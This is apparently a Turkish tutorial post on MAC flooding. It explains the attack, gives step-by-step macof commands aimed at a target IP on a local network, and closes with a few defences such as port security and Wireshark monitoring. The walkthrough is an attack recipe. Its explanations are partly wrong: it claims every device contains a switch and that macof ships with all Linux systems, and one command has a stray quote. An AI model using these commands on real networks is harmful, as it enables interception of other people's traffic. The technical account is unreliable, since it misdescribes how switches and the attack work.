Mac Flooding Saldırsı Nedir?

Mac Flooding saldırısı, saldırganın local ağ üzerinden hedef cihaza sahte mac adresleri yollayarak ağı dinlemeye hedeflemektedir. Bu saldırıya uğrayanların en büyük belirtisi ağ hızının çok yavaşlaması belirti olarak gösterebilir.

Bu saldırıyı anlamak için biraz detaya girelim.
Her cihazda
swicth (anahtarlayıcı) mevcuttur. Swicth'in görevi kendisine gelen ağ paketlerini cihaza göndermektir. Böylece cihazda ki ağ trafiği sorunsuz bir şekilde çalışmaya devam etmektedir.
Her swicth'in bir
mac adres tablosu (deposu) vardır. Bu dolduğunda ağ trafiği yavaşlayacaktır.

Mac Flood Saldırsı sonrasından ağ trafiğinde
swicth yerini hub'a bırakır. Hub swicth'e göre daha yavaş çalışma işlevinde olduğu için ağ trafiği yavaşlayacak ve ağ hızının düşüşüne sebep olacaktır.






Mac Flooding Saldırsı Nasıl Yapılır?

Şimdi bu saldırıyı bir de biz yapalım.

Kullanacağımız aracın ismi
Macof'tur.

Kod:
macof


Bu komut ile saldırı için ilk adımımızı atıyoruz.
Macof tüm Linux'larda mevcuttur. Bu yüzden herhangi bir yükleme yapmamıza gerek yok.

Kod:
macof -h


Bu komut ile
macof'un hangi parametreler ile neler yapacağımızı öğreniyoruz. Macof'un parametreleri şunlardır,
macof -i interface= Gönderilecek arabirimi belirtin
macof -s src = Kaynak IP adresini belirtin.
macof -d dst = Hedef IP adresini belirtin.
macof -e tha = Hedef cihazın adresini belirtin.
macof -x sport = TCP kaynak bağlantı noktasını belirtin
macof -y dport = TCP hedef bağlantı noktasını belirtin
macof -n times = Gönderilecek paket sayısını belirtin.

Biz basit bir saldırı yapıcağımızı için şu komutu yazıyoruz.

Kod:
macof -i eth0 -n 10 "


Hedef adrese saldırmak için şu komutu giriyoruz.

Kod:
macof -i eth0 -n 10 -d 000.000.00.000 (hedef Ip adresini yazıyoruz)


Bu komut ile saldırımızı gerçekleştirmiş oluyoruz.




Bu Saldırılara Karşı Alabiliceğiniz Önlemler

Swicth'i (anahtar) ayarlayarak bağlanacak Mac adreslerini sınırlı bir sayıya indirerek bu saldırıya karşı bir önlem alabilirsiniz.

Mac adresini filtreleyerek belirli sayıda Mac adresinin bağlanmasını izin verebilirsiniz.

Ağınızı her zaman wireshark programı ile takip edebilir ve böylece saldırının gerçekleştiği anda durumu fark edebilirsiniz.